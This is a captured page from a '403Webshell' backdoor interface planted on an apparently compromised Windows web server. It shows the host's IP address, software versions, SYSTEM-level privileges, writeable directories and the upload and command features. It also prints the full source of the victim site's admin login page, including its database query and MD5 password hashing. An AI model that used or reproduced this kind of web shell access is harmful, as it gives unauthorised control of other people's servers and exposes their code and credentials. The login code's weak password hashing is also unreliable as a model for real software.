403Webshell
Server IP : 104.21.80.248  /  Your IP : 172.71.28.156
Web Server : Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
System : Windows NT WIN-ECQAAA40806 6.2 build 9200 (Windows Server 2012 Standard Edition) i586
User : SYSTEM ( 0)
PHP Version : 5.6.30
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  E:/Inetpub/www/news/move/sfadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : E:/Inetpub/www/news/move/sfadmin/login.php
<?php session_start();
ob_start();

include('../db.php');?>
<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link href="style.css" rel="stylesheet" type="text/css">
<!--[if lt IE 9]>
<script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>

<body>

<div id="admin-hedder">

<div id="logo"></div>

</div><!--admin-hedder-->


<div class="admin-login-box">

<?php
$err=isset($_GET['error'])?$_GET['error']:""; 
if($err=='error'){?>
<div class="errormsgbox">Wrong Username or Password. Please try again.</div>	
<?php }

if(!isset($_SESSION['adminuser'])){
if($_SERVER["REQUEST_METHOD"] == "POST")
{
// username and password sent from Form
$adminuser=$mysqli->escape_string($_POST['adminuser']); 
$adminpassword=$mysqli->escape_string($_POST['adminpassword']); 
$gpassword=md5($adminpassword); // Encrypted Password

if($sql= $mysqli->query("SELECT id FROM admin WHERE adminuser='$adminuser' and adminpassword='$gpassword'")){

    $result = mysqli_fetch_array($sql);
	$count=mysqli_num_rows($sql);

// If result matched $username and $password, table row must be 1 row
if($count==1)
{
$_SESSION["adminuser"] = $adminuser;

header("location:index.php");
}
else
{
header("location:login.php?error=error");

}
}

$sql->close();
}

ob_end_flush();

?>
<div class="login_box">
<center><h1>Login to Admin Panel</h1></center>
<form action="login.php" method="post" id="login-form" class="theform">

<label for="adminuser">Username :</label>
<input type="text" name="adminuser"/>

<label for="adminpassword">Password :</label>
<input type="password" name="adminpassword"/>

<input type="submit" id="submit" value="Login to Admin Panel"/>

</form>
</div>

<?php }else{
header("location:index.php");
}

?>

</div><!--admin-login-box-->

<?php include('footer.php');?>

Youez - 2016 - github.com/yon3zu
LinuXploit